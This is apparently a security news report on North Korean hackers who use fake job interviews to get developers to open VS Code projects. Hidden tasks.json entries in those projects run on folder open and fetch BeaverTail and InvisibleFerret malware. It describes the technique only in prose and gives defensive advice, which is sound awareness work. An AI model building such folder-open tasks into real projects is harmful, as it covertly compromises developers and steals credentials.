North Korean Hackers Abuse VS Code Projects to Deploy Stealthy Backdoors

North Korean state-sponsored threat actors associated with the long-running Contagious Interview campaign have once again evolved their attack techniques by abusing Microsoft Visual Studio Code (VS Code) projects to deliver stealthy backdoors on developer systems.

Security researchers from Jamf Threat Labs revealed that attackers are now embedding malicious commands inside VS Code task configuration files, a technique first observed in December 2025 and continuously refined since then.

 Fake Job Interviews as an Entry Point

The attack typically begins with a fake job interview or coding test. Victims—mostly software developers—are instructed to clone a repository from platforms such as GitHub, GitLab, or Bitbucket and open it in VS Code.

When the project is opened, VS Code prompts the user to trust the repository author. If the user grants trust, the IDE automatically processes the tasks.json file, which can contain embedded arbitrary commands.

⚙️ Abuse of VS Code Tasks

The attackers configure tasks using the runOn: folderOpen option, ensuring the malicious code executes every time the project folder is opened. These tasks fetch obfuscated JavaScript payloads from attacker-controlled Vercel domains.

If the remote payload cannot be downloaded, the malware falls back to embedded JavaScript disguised as harmless dictionary files, ensuring execution continues.

Malware Payloads: BeaverTail & InvisibleFerret

Once executed, the payload deploys two malware families:

• BeaverTail – a Node.js-based backdoor enabling remote code execution

• InvisibleFerret – a Python-based second-stage malware for persistence, data theft, and cryptocurrency mining

On macOS systems, the malware uses background shell commands involving nohup, bash, and curl to silently pipe JavaScript directly into the Node.js runtime, allowing it to survive even if VS Code is closed.

Advanced Capabilities

The malware is capable of:

• System fingerprinting

• Continuous communication with a remote server

• Keystroke logging

• Screenshot capture

• Browser credential theft

• Clipboard cryptocurrency wallet replacement

• Deploying XMRig crypto miners

• Installing AnyDesk for remote access

In some cases, additional payloads were observed executing minutes after the initial infection, beaconing every few seconds and erasing traces on command.

Who Is Being Targeted?

These attacks mainly target developers working in cryptocurrency, blockchain, and fintech sectors, as they often have privileged access to sensitive systems, digital wallets, and source code.

How to Stay Protected

Security experts advise developers to:

• Avoid opening repositories from unknown sources

• Review tasks.json and configuration files before trusting a project

• Install only verified npm packages

• Be cautious during interview coding tests

• Use endpoint protection and monitoring tools

Final Thoughts

This campaign highlights how trusted developer tools like VS Code can be weaponized by advanced persistent threat (APT) groups. As threat actors continue to adapt rapidly, developer awareness and caution remain the strongest defense.